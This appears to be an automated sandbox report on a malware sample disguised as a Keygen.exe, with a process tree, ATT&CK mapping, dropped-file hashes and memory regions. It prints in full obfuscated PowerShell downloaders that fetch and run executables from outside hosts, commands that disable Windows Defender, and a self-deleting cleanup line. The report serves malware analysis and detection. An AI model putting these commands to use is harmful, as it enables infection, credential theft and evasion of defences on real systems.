$edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:984
                • C:\Users\Public\bvz.exe
                  "C:\Users\Public\bvz.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5020
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                    6⤵
                      PID:2140
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2912
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                          8⤵
                            PID:192
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              9⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2364
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                10⤵
                                • Executes dropped EXE
                                PID:4568
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                            8⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:4296
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 4296 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\827513869788984\\* & exit
                              9⤵
                                PID:1432
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 4296
                                  10⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4836
                        • C:\Users\Public\bvz.exe
                          "C:\Users\Public\bvz.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:4300
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1A25.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2548
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1772
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 2
                    3⤵
                    • Delays execution with timeout.exe
                    PID:1320
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1A25.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4376
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4460
                      • C:\Users\Public\hts.exe
                        "C:\Users\Public\hts.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:3148
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:4848
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:4108
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 4108 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\687107524062066\\* & exit
                              8⤵
                                PID:4688
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 4108
                                  9⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4380
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:4860
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:4940
                          • C:\Users\Public\hts.exe
                            "C:\Users\Public\hts.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:3348
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1A25.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4564
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4664
                • C:\Windows\SysWOW64\DllHost.exe
                  C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  1⤵
                    PID:4756
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c start C:\Windows\temp\qthrnnht.exe
                      2⤵
                        PID:1428
                        • C:\Windows\temp\qthrnnht.exe
                          C:\Windows\temp\qthrnnht.exe
                          3⤵
                          • Executes dropped EXE
                          PID:4900
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4364
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4844
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4872
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1180
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                            4⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1196
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                            4⤵
                              PID:2776
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                              4⤵
                                PID:3424
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /IM cmstp.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1448

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Persistence

                        Modify Existing Service

                        1
                        T1031

                        Defense Evasion

                        Modify Registry

                        2
                        T1112

                        Disabling Security Tools

                        2
                        T1089

                        Credential Access

                        Credentials in Files

                        3
                        T1081

                        Discovery

                        Query Registry

                        2
                        T1012

                        System Information Discovery

                        2
                        T1082

                        Collection

                        Data from Local System

                        3
                        T1005

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\freebl3.dll
                        • C:\ProgramData\mozglue.dll
                        • C:\ProgramData\mozglue.dll
                        • C:\ProgramData\msvcp140.dll
                        • C:\ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • C:\ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • C:\ProgramData\softokn3.dll
                        • C:\ProgramData\sqlite3.dll
                        • C:\ProgramData\sqlite3.dll
                        • C:\ProgramData\vcruntime140.dll
                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\Keygen.exe
                        • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\Keygen.exe
                        • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\b.hta
                        • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\b1.hta
                        • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\ba.hta
                        • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\ba1.hta
                        • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\m.hta
                        • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\m1.hta
                        • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\start.bat
                        • C:\Users\Admin\AppData\Local\Temp\2jaWbMkMaF.exe
                        • C:\Users\Admin\AppData\Local\Temp\2jaWbMkMaF.exe
                        • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                        • C:\Users\Admin\AppData\Local\Temp\JmLnxuRkJp.exe
                          MD5

                          013db621a3351e3fb049efd2ccad79ff

                          SHA1

                          a23394ea54dbc5342a77938a2c285ee616185560

                          SHA256

                          df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                          SHA512

                          1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                        • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                        • C:\Users\Admin\AppData\Local\Temp\qSa0iAJjZT.exe
                        • C:\Users\Admin\AppData\Local\Temp\qSa0iAJjZT.exe
                        • C:\Users\Admin\AppData\Local\Temp\zVeaQKZPZq.exe
                        • C:\Users\Admin\AppData\Local\Temp\zVeaQKZPZq.exe
                        • C:\Users\Public\bvz.exe
                        • C:\Users\Public\bvz.exe
                        • C:\Users\Public\bvz.exe
                        • C:\Users\Public\hts.exe
                        • C:\Users\Public\hts.exe
                        • C:\Users\Public\hts.exe
                        • C:\Users\Public\tlp.exe
                        • C:\Users\Public\tlp.exe
                        • C:\Users\Public\tlp.exe
                        • C:\Windows\Temp\qthrnnht.exe
                          MD5

                          f4b5c1ebf4966256f52c4c4ceae87fb1

                          SHA1

                          ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                          SHA256

                          88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                          SHA512

                          02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                        • C:\Windows\temp\qthrnnht.exe
                          MD5

                          f4b5c1ebf4966256f52c4c4ceae87fb1

                          SHA1

                          ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                          SHA256

                          88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                          SHA512

                          02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                        • C:\Windows\temp\ri50lnh4.inf
                        • \ProgramData\mozglue.dll
                        • \ProgramData\mozglue.dll
                        • \ProgramData\mozglue.dll
                        • \ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • \ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • \ProgramData\nss3.dll
                          MD5

                          bfac4e3c5908856ba17d41edcd455a51

                          SHA1

                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                          SHA256

                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                          SHA512

                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                        • \ProgramData\sqlite3.dll
                        • \ProgramData\sqlite3.dll
                        • \ProgramData\sqlite3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                          MD5

                          02cc7b8ee30056d5912de54f1bdfc219

                          SHA1

                          a6923da95705fb81e368ae48f93d28522ef552fb

                          SHA256

                          1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                          SHA512

                          0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                        • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                        • \Users\Admin\AppData\LocalLow\sqlite3.dll
                        • memory/192-232-0x0000000000000000-mapping.dmp
                        • memory/548-226-0x0000000000000000-mapping.dmp
                        • memory/848-0-0x0000000000000000-mapping.dmp
                        • memory/984-80-0x0000000008A40000-0x0000000008A41000-memory.dmp
                          Filesize

                          4KB

                        • memory/984-98-0x0000000007C60000-0x0000000007C61000-memory.dmp
                          Filesize

                          4KB

                        • memory/984-27-0x0000000070420000-0x0000000070B0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/984-22-0x0000000000000000-mapping.dmp
                        • memory/984-99-0x000000000A010000-0x000000000A011000-memory.dmp
                          Filesize

                          4KB

                        • memory/984-96-0x0000000009160000-0x0000000009161000-memory.dmp
                          Filesize

                          4KB

                        • memory/984-52-0x0000000007CA0000-0x0000000007CA1000-memory.dmp
                          Filesize

                          4KB

                        • memory/1180-373-0x0000000000000000-mapping.dmp
                        • memory/1180-377-0x00007FFBC6460000-0x00007FFBC6E4C000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/1196-383-0x00007FFBC6460000-0x00007FFBC6E4C000-memory.dmp
                          Filesize

                          9.9MB

                        • memory/1196-374-0x0000000000000000-mapping.dmp
                        • memory/1320-20-0x0000000000000000-mapping.dmp
                        • memory/1428-324-0x0000000000000000-mapping.dmp
                        • memory/1432-261-0x0000000000000000-mapping.dmp
                        • memory/1448-335-0x0000000000000000-mapping.dmp
                        • memory/1664-3-0x0000000000000000-mapping.dmp
                        • memory/1664-2-0x0000000000000000-mapping.dmp
                        • memory/1772-30-0x0000000070420000-0x0000000070B0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/1772-26-0x0000000000000000-mapping.dmp
                        • memory/1772-59-0x0000000008860000-0x0000000008861000-memory.dmp
                          Filesize

                          4KB

                        • memory/1836-15-0x0000000000000000-mapping.dmp
                        • memory/2060-7-0x0000000000000000-mapping.dmp
                        • memory/2140-208-0x0000000000000000-mapping.dmp
                        • memory/2188-9-0x0000000000000000-mapping.dmp
                        • memory/2364-245-0x0000000004C60000-0x0000000004C61000-memory.dmp
                          Filesize

                          4KB

                        • memory/2364-242-0x0000000072400000-0x0000000072AEE000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2364-240-0x0000000000000000-mapping.dmp
                        • memory/2364-265-0x000000000A820000-0x000000000A844000-memory.dmp
                          Filesize

                          144KB

                        • memory/2364-243-0x00000000003B0000-0x00000000003B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2548-19-0x0000000000000000-mapping.dmp
                        • memory/2552-10-0x0000000000000000-mapping.dmp
                        • memory/2720-284-0x0000000005270000-0x0000000005271000-memory.dmp
                          Filesize

                          4KB

                        • memory/2720-275-0x0000000071BB0000-0x000000007229E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2720-272-0x0000000000000000-mapping.dmp
                        • memory/2720-345-0x0000000005610000-0x0000000005633000-memory.dmp
                          Filesize

                          140KB

                        • memory/2720-276-0x0000000000970000-0x0000000000971000-memory.dmp
                          Filesize

                          4KB

                        • memory/2720-347-0x0000000005640000-0x0000000005664000-memory.dmp
                          Filesize

                          144KB

                        • memory/2776-389-0x0000000000000000-mapping.dmp
                        • memory/2912-219-0x0000000072400000-0x0000000072AEE000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/2912-217-0x0000000000000000-mapping.dmp
                        • memory/2912-230-0x000000000A5E0000-0x000000000A631000-memory.dmp
                          Filesize

                          324KB

                        • memory/2912-225-0x00000000021C0000-0x00000000021C1000-memory.dmp
                          Filesize

                          4KB

                        • memory/2912-223-0x0000000000170000-0x0000000000171000-memory.dmp
                          Filesize

                          4KB

                        • memory/3148-143-0x0000000000000000-mapping.dmp
                        • memory/3264-17-0x0000000070420000-0x0000000070B0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/3264-49-0x0000000007B60000-0x0000000007B61000-memory.dmp
                          Filesize

                          4KB

                        • memory/3264-12-0x0000000000000000-mapping.dmp
                        • memory/3264-31-0x00000000073B0000-0x00000000073B1000-memory.dmp
                          Filesize

                          4KB

                        • memory/3348-158-0x000000000043FCC3-mapping.dmp
                        • memory/3348-161-0x0000000000400000-0x0000000000498000-memory.dmp
                          Filesize

                          608KB

                        • memory/3776-298-0x0000000000C40000-0x0000000000C41000-memory.dmp
                          Filesize

                          4KB

                        • memory/3776-304-0x000000000A510000-0x000000000A521000-memory.dmp
                          Filesize

                          68KB

                        • memory/3776-318-0x000000000A9B0000-0x000000000A9B3000-memory.dmp
                          Filesize

                          12KB

                        • memory/3776-288-0x0000000000000000-mapping.dmp
                        • memory/3776-294-0x0000000000480000-0x0000000000481000-memory.dmp
                          Filesize

                          4KB

                        • memory/3776-293-0x0000000071BB0000-0x000000007229E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/3884-77-0x0000000009DA0000-0x0000000009DA1000-memory.dmp
                          Filesize

                          4KB

                        • memory/3884-21-0x0000000004B10000-0x0000000004B11000-memory.dmp
                          Filesize

                          4KB

                        • memory/3884-36-0x0000000007DF0000-0x0000000007DF1000-memory.dmp
                          Filesize

                          4KB

                        • memory/3884-37-0x0000000007FC0000-0x0000000007FC1000-memory.dmp
                          Filesize

                          4KB

                        • memory/3884-40-0x0000000008030000-0x0000000008031000-memory.dmp
                          Filesize

                          4KB

                        • memory/3884-24-0x0000000007570000-0x0000000007571000-memory.dmp
                          Filesize

                          4KB

                        • memory/3884-16-0x0000000070420000-0x0000000070B0E000-memory.dmp
                          Filesize

                          6.9MB

                        • memory/3884-13-0x0000000000000000-mapping.dmp
                        • memory/4104-319-0x0000000000000000-mapping.dmp
                        • memory/4104-390-0x0000000009A00000-0x0000000009A01000-memory.dmp
                          Filesize

                          4KB

                        • memory/4104-394-0x00000000099E0000-0x00000000099E1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4104-362-0x0000000009900000-0x0000000009901000-memory.dmp
                          Filesize

                          4KB

